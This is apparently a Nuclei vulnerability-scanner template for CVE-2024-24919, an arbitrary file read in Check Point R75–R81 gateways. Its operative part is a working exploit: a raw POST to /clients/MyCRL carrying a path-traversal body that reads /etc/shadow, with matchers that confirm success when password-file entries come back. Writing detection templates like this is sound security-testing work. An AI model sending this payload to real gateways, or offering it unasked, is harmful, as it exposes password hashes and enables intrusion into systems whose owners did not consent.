id: CVE-2024-24919 info: name: Check Point R81, R80, R77, R75 - Arbitrary File Read author: johnk3r severity: high description: | CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade. reference: - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/ - https://support.checkpoint.com/results/sk/sk182337 metadata: max-request: 1 vendor: checkpoint tags: cve,cve2024,checkpoint http: - raw: - | POST /clients/MyCRL HTTP/1.1 Host: {{Hostname}} aCSHELL/../../../../../../../etc/shadow matchers-condition: and matchers: - type: regex part: body regex: - "root:" - "nobody:" condition: and - type: status status: - 200